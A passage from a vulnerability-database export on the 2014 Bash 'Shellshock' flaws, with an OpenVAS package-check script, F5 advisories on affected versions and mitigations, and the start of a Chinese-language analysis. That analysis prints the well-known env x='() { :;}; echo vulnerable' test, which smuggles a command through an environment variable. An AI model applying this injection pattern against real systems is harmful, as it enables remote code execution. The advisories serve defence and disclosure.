any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850616\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:10 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1242-1)\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1242-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo\", rpm:\"bash-debuginfo~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debugsource\", rpm:\"bash-debugsource~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-devel\", rpm:\"bash-devel~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables\", rpm:\"bash-loadables~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-loadables-debuginfo\", rpm:\"bash-loadables-debuginfo~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo\", rpm:\"libreadline6-debuginfo~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel\", rpm:\"readline-devel~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-debuginfo-32bit\", rpm:\"bash-debuginfo-32bit~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-32bit\", rpm:\"libreadline6-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6-debuginfo-32bit\", rpm:\"libreadline6-debuginfo-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-devel-32bit\", rpm:\"readline-devel-32bit~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eadline-doc\", rpm:\"eadline-doc~6.2~68.8.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2017-11-02T18:33:14", "bulletinFamily": "software", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "edition": 1, "description": "\nF5 Product Development has assigned ID 480931 (BIG-IP), ID 481250 and ID 481247 (BIG-IQ), ID 483716 (Enterprise Manager), and ID 481070 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H508109 on the **Diagnostics **> **Identified **> **High **screen. \n\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.6.0 \n11.0.0 - 11.5.1 \n10.0.0 - 10.2.4 \n| 12.0.0 \n11.6.0 HF1 \n11.5.2 - 11.5.3 \n11.5.1 HF5 \n11.5.0 HF5 \n11.4.1 HF5 \n11.4.0 HF8 \n11.3.0 HF10 \n11.2.1 HF12 \n10.2.4 HF9 | Bash shell \nDHCP client (dhclient) \n \nBIG-IP AAM | 11.6.0 \n11.4.0 - 11.5.1 | 12.0.0 \n11.6.0 HF1 \n11.5.2 - 11.5.3 \n11.5.1 HF5 \n11.5.0 HF5 \n11.4.1 HF5 \n11.4.0 HF8 \n| Bash shell \nDHCP client (dhclient) \n \nBIG-IP AFM | 11.6.0 \n11.3.0 - 11.5.1 \n| 12.0.0 \n11.6.0 HF1 \n11.5.2 - 11.5.3 \n11.5.1 HF5 \n11.5.0 HF5 \n11.4.1 HF5 \n11.4.0 HF8 \n11.3.0 HF10 \n| Bash shell \nDHCP client (dhclient) \n \nBIG-IP Analytics | 11.6.0 \n11.0.0 - 11.5.1 \n| 12.0.0 \n11.6.0 HF1 \n11.5.2 - 11.5.3 \n11.5.1 HF5 \n11.5.0 HF5 \n11.4.1 HF5 \n11.4.0 HF8 \n11.3.0 HF10 \n11.2.1 HF12 \n| Bash shell \nDHCP client (dhclient) \n \nBIG-IP APM | 11.6.0 \n11.0.0 - 11.5.1 \n10.1.0 - 10.2.4 \n| 12.0.0 \n11.6.0 HF1 \n11.5.2 - 11.5.3 \n11.5.1 HF5 \n11.5.0 HF5 \n11.4.1 HF5 \n11.4.0 HF8 \n11.3.0 HF10 \n11.2.1 HF12 \n10.2.4 HF9 | Bash shell \nDHCP client (dhclient) \n \nBIG-IP ASM | 11.6.0 \n11.0.0 - 11.5.1 \n10.0.0 - 10.2.4 \n| 12.0.0 \n11.6.0 HF1 \n11.5.2 - 11.5.3 \n11.5.1 HF5 \n11.5.0 HF5 \n11.4.1 HF5 \n11.4.0 HF8 \n11.3.0 HF10 \n11.2.1 HF12 \n10.2.4 HF9 | Bash shell \nDHCP client (dhclient) \n \nBIG-IP DNS | None | 12.0.0 | None \nBIG-IP Edge Gateway \n| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| 11.3.0 HF10 \n11.2.1 HF12 \n10.2.4 HF9 | Bash shell \nDHCP client (dhclient) \n \nBIG-IP GTM | 11.6.0 \n11.0.0 - 11.5.1 \n10.0.0 - 10.2.4 \n| 11.6.0 HF1 \n11.5.2 - 11.5.3 \n11.5.1 HF5 \n11.5.0 HF5 \n11.4.1 HF5 \n11.4.0 HF8 \n11.3.0 HF10 \n11.2.1 HF12 \n10.2.4 HF9 | Bash shell \nDHCP client (dhclient) \nBIG-IP Link Controller | 11.6.0 \n11.0.0 - 11.5.1 \n10.0.0 - 10.2.4 \n| 12.0.0 \n11.6.0 HF1 \n11.5.2 - 11.5.3 \n11.5.1 HF5 \n11.5.0 HF5 \n11.4.1 HF5 \n11.4.0 HF8 \n11.3.0 HF10 \n11.2.1 HF12 \n10.2.4 HF9 | Bash shell \nDHCP client (dhclient) \n \nBIG-IP PEM | 11.6.0 \n11.3.0 - 11.5.1 \n| 12.0.0 \n11.6.0 HF1 \n11.5.2 - 11.5.3 \n11.5.1 HF5 \n11.5.0 HF5 \n11.4.1 HF5 \n11.3.0 HF10 \n| Bash shell \nDHCP client (dhclient) \n \nBIG-IP PSM | 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 \n| 11.4.1 HF5 \n11.4.0 HF8 \n11.3.0 HF10 \n11.2.1 HF12 \n10.2.4 HF9 | Bash shell \nDHCP client (dhclient) \n \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 \n| 11.3.0 HF10 \n11.2.1 HF12 \n10.2.4 HF9 | Bash shell \nDHCP client (dhclient) \n \nBIG-IP WOM | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 \n| 11.3.0 HF10 \n11.2.1 HF12 \n10.2.4 HF9 | Bash shell \nDHCP client (dhclient) \n \nARX | 6.0.0 - 6.4.0 | 6.4.0 HFRU8 \n6.3.0 HFRU10 \n6.2.0 HFRU11 | Bash shell \nEnterprise Manager | 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0 \n| 3.1.1 HF4 | Bash shell \nDHCP client (dhclient) \n \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | 4.0.0 - 4.4.0 | 4.5.0 \n4.4.0 HF1 \n4.3.0 HF2 | Bash shell \nDHCP client (dhclient) \n \nBIG-IQ Device | 4.2.0 - 4.4.0 | 4.5.0 \n4.4.0 HF1 \n4.3.0 HF2 | Bash shell \nDHCP client (dhclient) \n \nBIG-IQ Security | 4.0.0 - 4.4.0 | 4.5.0 \n4.4.0 HF1 \n4.3.0 HF2 | Bash shell \nDHCP client (dhclient) \n \nLineRate | None | 2.4.0 - 2.4.1 \n2.3.0 - 2.3.1 \n2.2.0 - 2.2.4 \n1.6.0 - 1.6.3 | None \nTraffix SDC | 4.1.0 \n4.0.0 - 4.0.5 \n3.5.1 \n3.4.1 \n3.3.2 | None | Bash shell \n \n**Note**: The hotfixes listed in the **Versions known to be not vulnerable** column address all of the aforementioned CVEs. \n\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 is responding to this vulnerability as determined by the parameters defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability, you should only permit access to F5 products over a secure network and limit login access to trusted users. For additional information, refer to the links in the following [Supplemental Information](<https://support.f5.com/csp/article/K15629#supplemental>) section. \n\n\n**DHCP client (dhclient) \n**\n\nTo mitigate the DHCP client vulnerability, you should disable DHCP and use a static IP for the management address. Refer to the following steps to disable DHCP for the management address.\n\n**Note**: The vulnerability window for DHCP is limited to periods when the system is attempting to obtain a new DHCP lease, such as immediately after booting, or when an existing lease expires and needs to be renewed.\n\n**Impact of action:** You will need an available IP address for the management address. \n\n\n 1. Log in to the command line of the BIG-IP, BIG-IQ, or Enterprise Manager device, using the self IP address, or log in over a console connection. \n\n 2. Start the **config** utility by typing the following command:\n\nconfig\n\n 3. Follow the prompts to configure a static IP for the management address.****\n\n**Traffix SDC**\n\nThe Traffix Signaling Delivery Controller (SDC) does not use mail services (such as Postfix) or web services with enabled CGI, where the Bash shellshock vulnerability is most prevalent. However, F5 still recommends that you upgrade Bash, due to other possible techniques that can be used to exploit this weakness. For information about contacting F5 Technical Support to upgrade Bash on Traffix SDC, refer to [K14655: Information required when opening a support case for Traffix Signaling Delivery Controller](<https://support.f5.com/csp/article/K14655>). \n\n\n * **Shellshock resources on DevCentral:**\n\n**Note**: A DevCentral login is required to access the following four resources:\n\n[](<https://devcentral.f5.com/articles/shellshock-mitigation-with-big-ip-irules>)\n * [DevCentral: Shellshock mitigation with BIG-IP iRules](<https://devcentral.f5.com/articles/shellshock-mitigation-with-big-ip-irules>)\n * [](<https://devcentral.f5.com/articles/shellshock-mitigation-with-big-ip-irules>)[DevCentral: CVE-2014-6271 Shellshocked](<https://devcentral.f5.com/articles/cve-2014-6271-shellshocked>)\n * [DevCentral: Shellshock mitigation with LineRate Proxy](<https://devcentral.f5.com/articles/shellshock-mitigation-with-linerate-proxy>)\n * [DevCentral: 3 Ways to use BIG-IP ASM to Mitigate Shellshock](<https://devcentral.f5.com/articles/3-ways-to-use-big-ip-asm-to-mitigate-shellshock>)\n * [Mitigating the Bash Shellshock Vulnerabilities](<http://www.f5.com/shellshock>) \n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13309: Restricting access to the Configuration utility by source IP address (11.x)](<https://support.f5.com/csp/article/K13309>) \n\n * [K7448: Restricting access to the Configuration utility by source IP address (9.x - 10.x)](<https://support.f5.com/csp/article/K7448>)\n * [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>)\n", "modified": "2016-01-09T02:20:00", "published": "2014-09-26T00:31:00", "href": "https://support.f5.com/csp/article/K15629", "id": "F5:K15629", "title": "Multiple GNU Bash vulnerabilities", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:10", "bulletinFamily": "software", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "edition": 1, "description": "[CVE-2014-6271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>)\n\nGNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.\n\n[CVE-2014-7169](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>)\n\nGNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.\n\n[CVE-2014-7186](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>)\n\nThe redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the \"redir_stack\" issue.\n\n[CVE-2014-7187](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>)\n\nOff-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the \"word_lineno\" issue.\n\n[CVE-2014-6277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>)\n\nGNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.\n\n[CVE-2014-6278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>)\n\nGNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.\n", "modified": "2015-05-22T00:00:00", "published": "2014-09-25T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html", "id": "SOL15629", "title": "SOL15629 - Multiple GNU Bash vulnerabilities", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T13:12:35", "description": "<h1>1. \u66f4\u65b0\u60c5\u51b5</h1><table><colgroup><col width=\"NaN%\"><col width=\"NaN%\"><col width=\"NaN%\"></colgroup><tbody><tr><td>\u7248\u672c</td><td>\u65f6\u95f4</td><td>\u63cf\u8ff0</td></tr><tr><td>\u7b2c\u4e00\u7248</td><td>2014/9/26 \u4e2d\u5348</td><td>\u7b2c\u4e00\u7248\u5b8c\u6210\u3002</td></tr><tr><td>\u7b2c\u4e8c\u7248</td><td>2014/9/26 \u4e0b\u5348</td><td>1. \u65b0\u589e\uff1a\u52a0\u901f\u4e50\u9632\u5fa1\u5e73\u53f0\u7684\u653b\u51fb\u7edf\u8ba1\u7ec6\u8282\uff1b<br>2. \u5b8c\u5584\uff1a\u4fee\u590d\u5efa\u8bae\uff1b</td></tr><tr><td>\u7b2c\u4e09\u7248</td><td>2014/9/27 \u4e0b\u5348</td><td>1. \u7834\u58f3\u6f0f\u6d1e\u5b98\u7f51\u51fa\u73b0\uff1ashellshocker.net<br>2. \u66f4\u65b0\uff1a\u6f0f\u6d1e\u6982\u8981\uff1b<br>3. \u65b0\u589e\uff1a\u8865\u4e01\u7ed5\u8fc7\u540e\uff08CVE-2014-7169\uff09\u7684\u6f0f\u6d1e\u6e90\u7801\u7ea7\u5206\u6790\uff1b<br>4. \u65b0\u589e\uff1aZoomEye\u7b2c\u56db\u7ec4\u6570\u636e\uff1aQNAP NAS\u6f0f\u6d1e\u60c5\u51b5\uff1b<br>5. \u65b0\u589e\uff1aZoomEye\u7b2c\u4e94\u7ec4\u6570\u636e\uff1aCheckPoint\u5b89\u5168\u7f51\u5173\u6f0f\u6d1e\u60c5\u51b5\uff1b<br>6. \u5b8c\u5584\uff1a\u4fee\u590d\u5efa\u8bae\uff1b<br>7. \u65b0\u589e\uff1a\u76f8\u5173\u8d44\u6e90\u94fe\u63a5\uff1b</td></tr><tr><td>\u7b2c\u56db\u7248</td><td>2014/10/14 \u665a</td><td>1. \u66f4\u65b0\uff1a\u6f0f\u6d1e\u6982\u8981\uff0c\u6dfb\u52a0\u66f4\u591a\u6f0f\u6d1e\u8bf4\u660e\uff1b<br>2. \u65b0\u589e\uff1aZoomEye\u7b2c\u516d\u7ec4\u6570\u636e\uff1aMirapoint\u90ae\u4ef6\u670d\u52a1\u5668\u6f0f\u6d1e\u60c5\u51b5\uff1b<br>3. \u65b0\u589e\uff1aZoomEye\u7b2c\u4e03\u7ec4\u6570\u636e\uff1aAVAYA IP\u7535\u8bdd\u6f0f\u6d1e\u60c5\u51b5\uff1b<br>4. \u66f4\u65b0\uff1aZoomEye\u5404\u7ec4\u6570\u636e\uff1b<br>5. \u5b8c\u5584\uff1a\u5176\u4ed6\u7ed3\u8bba\uff1b</td></tr></tbody></table><h1>2. \u6f0f\u6d1e\u6982\u8981</h1><p>2014\u5e749\u670824\u65e5\uff0cBash\u60ca\u7206\u4e25\u91cd\u5b89\u5168\u6f0f\u6d1e\uff0c\u7f16\u53f7\u4e3aCVE-2014-6271\uff0c\u8be5\u6f0f\u6d1e\u5c06\u5bfc\u81f4\u8fdc\u7a0b\u653b\u51fb\u8005\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002</p><p>GNU Bash\u662f\u4e00\u4e2a\u4e3aGNU\u8ba1\u5212\u7f16\u5199\u7684Unix Shell\uff0c\u5e7f\u6cdb\u4f7f\u7528\u5728Linux\u7cfb\u7edf\u5185\uff0c\u6700\u521d\u7684\u529f\u80fd\u4ec5\u662f\u4e00\u4e2a\u7b80\u5355\u7684\u57fa\u4e8e\u7ec8\u7aef\u7684\u547d\u4ee4\u89e3\u91ca\u5668\u3002</p><p><strong>2.1. \u6f0f\u6d1e\u63cf\u8ff0</strong></p><p>GNU Bash 4.3\u53ca\u4e4b\u524d\u7248\u672c\u5728\u8bc4\u4f30\u67d0\u4e9b\u6784\u9020\u7684\u73af\u5883\u53d8\u91cf\u65f6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u5411\u73af\u5883\u53d8\u91cf\u503c\u5185\u7684\u51fd\u6570\u5b9a\u4e49\u540e\u6dfb\u52a0\u591a\u4f59\u7684\u5b57\u7b26\u4e32\u4f1a\u89e6\u53d1\u6b64\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u6539\u53d8\u6216\u7ed5\u8fc7\u73af\u5883\u9650\u5236\uff0c\u4ee5\u6267\u884cShell\u547d\u4ee4\u3002\u67d0\u4e9b\u670d\u52a1\u548c\u5e94\u7528\u5141\u8bb8\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u63d0\u4f9b\u73af\u5883\u53d8\u91cf\u4ee5\u5229\u7528\u6b64\u6f0f\u6d1e\u3002\u6b64\u6f0f\u6d1e\u6e90\u4e8e\u5728\u8c03\u7528Bash Shell\u4e4b\u524d\u53ef\u4ee5\u7528\u6784\u9020\u7684\u503c\u521b\u5efa\u73af\u5883\u53d8\u91cf\u3002\u8fd9\u4e9b\u53d8\u91cf\u53ef\u4ee5\u5305\u542b\u4ee3\u7801\uff0c\u5728Shell\u88ab\u8c03\u7528\u540e\u4f1a\u88ab\u7acb\u5373\u6267\u884c\u3002</p><p>\u4ee5\u4e0b\u51e0\u70b9\u503c\u5f97\u7279\u522b\u6ce8\u610f\uff1a</p><ul><li>\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u82f1\u6587\u662f\uff1aShellShock\uff0c\u4e2d\u6587\u540d\u88abXCERT\u547d\u540d\u4e3a\uff1a\u7834\u58f3\u6f0f\u6d1e\u3002</li><li>\u6765\u81eaCVSS\u7684\u8bc4\u5206\uff1a\u7834\u58f3\u6f0f\u6d1e\u7684\u4e25\u91cd\u6027\u88ab\u5b9a\u4e49\u4e3a10\u7ea7\uff08\u6700\u9ad8\uff09\uff0c\u4eca\u5e744\u6708\u7206\u53d1\u7684OpenSSL\u201c\u5fc3\u810f\u51fa\u8840\u201d\u6f0f\u6d1e\u624d5\u7ea7\uff01</li><li>\u7834\u58f3\u6f0f\u6d1e\u5b58\u5728\u670925\u5e74\uff0c\u548cBash\u5e74\u9f84\u4e00\u6837\u3002</li></ul><p><strong>2.2. \u6f0f\u6d1e\u5f71\u54cd</strong></p><p>GNU Bash <= 4.3\uff0c\u6b64\u6f0f\u6d1e\u53ef\u80fd\u4f1a\u5f71\u54cd\u5230\uff1a</p><p><b>\u6ce8\uff1a\u4ee5\u4e0b\u51e0\u70b9\u53c2\u8003\u81ea\uff1a</b></p><p><b><a href=\"https://raw.githubusercontent.com/citypw/DNFWAH/master/4/d4_0x07_DNFWAH_shellshock_bash_story_cve-2014-6271.txt\">https://raw.githubusercontent.com/citypw/DNFWAH/master/4/d4_0x07_DNFWAH_shellshock_bash_story_cve-2014-6271.txt</a></b><b>\uff0c\u4e14\u7ed3\u8bba\u7ecf\u8fc7\u6211\u4eec\u9a8c\u8bc1\u6709\u6548\u3002</b></p><ul><li>\u5728SSHD\u914d\u7f6e\u4e2d\u4f7f\u7528\u4e86ForceCommand\u7528\u4ee5\u9650\u5236\u8fdc\u7a0b\u7528\u6237\u6267\u884c\u547d\u4ee4\uff0c\u8fd9\u4e2a\u6f0f\u6d1e\u53ef\u4ee5\u7ed5\u8fc7\u9650\u5236\u53bb\u6267\u884c\u4efb\u4f55\u547d\u4ee4\u3002\u4e00\u4e9bGit\u548cSubversion\u90e8\u7f72\u73af\u5883\u7684\u9650\u5236Shell\u4e5f\u4f1a\u51fa\u73b0\u7c7b\u4f3c\u60c5\u51b5\uff0cOpenSSH\u901a\u5e38\u7528\u6cd5\u6ca1\u6709\u95ee\u9898\u3002</li><li>Apache\u670d\u52a1\u5668\u4f7f\u7528mod_cgi\u6216\u8005mod_cgid\uff0c\u5982\u679cCGI\u811a\u672c\u5728BASH\u6216\u8005\u8fd0\u884c\u5728\u5b50Shell\u91cc\u90fd\u4f1a\u53d7\u5f71\u54cd\u3002\u5b50Shell\u4e2d\u4f7f\u7528C\u7684system/popen\uff0cPython\u4e2d\u4f7f\u7528os.system/os.popen\uff0cPHP\u4e2d\u4f7f\u7528system/exec(CGI\u6a21\u5f0f)\u548cPerl\u4e2d\u4f7f\u7528open/system\u7684\u60c5\u51b5\u90fd\u4f1a\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\u3002</li><li>PHP\u811a\u672c\u6267\u884c\u5728mod_php\u4e0d\u4f1a\u53d7\u5f71\u54cd\u3002</li><li>DHCP\u5ba2\u6237\u7aef\u8c03\u7528Shell\u811a\u672c\u63a5\u6536\u8fdc\u7a0b\u6076\u610f\u670d\u52a1\u5668\u7684\u73af\u5883\u53d8\u91cf\u53c2\u6570\u503c\u7684\u60c5\u51b5\u4f1a\u88ab\u6b64\u6f0f\u6d1e\u5229\u7528\u3002</li><li>\u5b88\u62a4\u8fdb\u7a0b\u548cSUID\u7a0b\u5e8f\u5728\u73af\u5883\u53d8\u91cf\u8bbe\u7f6e\u7684\u73af\u5883\u4e0b\u6267\u884cShell\u811a\u672c\u4e5f\u53ef\u80fd\u53d7\u5230\u5f71\u54cd\u3002</li><li>\u4efb\u4f55\u5176\u4ed6\u7a0b\u5e8f\u6267\u884cShell\u811a\u672c\u65f6\u7528Bash\u4f5c\u4e3a\u89e3\u91ca\u5668\u90fd\u53ef\u80fd\u53d7\u5f71\u54cd\u3002Shell\u811a\u672c\u4e0d\u5bfc\u51fa\u7684\u60c5\u51b5\u4e0b\u4e0d\u4f1a\u53d7\u5f71\u54cd\u3002</li></ul><p><strong>2.3. \u6f0f\u6d1e\u9a8c\u8bc1</strong></p><p>\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\u6765\u68c0\u67e5\u7cfb\u7edf\u662f\u5426\u5b58\u5728\u6b64\u6f0f\u6d1e\uff08\u5728\u672c\u673aBash\u73af\u5883\u4e0b\u8fd0\u884c\uff09\uff1a</p><p><b>\u7834\u58f3</b><b>1</b><b>\uff0c</b><b>CVE-2014-6271</b><b>\uff0c\u6d4b\u8bd5\u65b9\u6cd5\uff1a</b></p><p>env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"</p><p>\u5982\u6267\u884c\u7ed3\u679c\u5982\u4e0b\u8868\u660e\u6709\u6f0f\u6d1e\uff1a</p><p>vulnerablethis is a test</p><p><b>\u6ce8\uff1a</b><b>CVE-2014-6271</b><b>\u7684\u6f0f\u6d1e\u6e90\u7801\u7ea7\u5206\u6790\u8bf7\u53c2\u8003\uff1a</b></p><p><b><a 